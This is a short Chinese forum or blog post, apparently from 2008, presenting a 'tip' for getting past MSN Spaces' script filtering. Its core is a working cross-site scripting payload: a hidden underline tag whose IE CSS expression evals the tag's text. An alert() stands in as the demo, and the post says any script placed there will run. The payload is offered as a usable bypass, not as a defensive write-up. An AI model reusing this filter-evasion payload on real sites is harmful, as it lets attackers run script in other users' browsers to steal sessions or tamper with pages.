如何突破MSN Spaces的JavaScript防线 - MSN space技巧发布 - MSN Space 交流论坛 | MSN Space 社区 | 论
MSN Spaces允许用户在编辑文章或者HTML模块的时候直接加入一些HTML标签,同时为了确保安全性,对可能执行脚本的代码作了严格的过滤。
-不过凡事总有百密一疏的时候,下面的这段代码演示了如何突破Spaces的脚本防线:
<u style="display:none;width:expression(eval(innerText+';color:0'))">
alert('http://0x2e.blogspot.com');outerHTML='';
</u>
实际上在下划线标签之中,你填写的内容都被作为脚本执行。遗憾的是这种办法由于IE Expression的限制,只对IE有效。
Friday, June 27, 2008
Subscribe to:
Posts (Atom)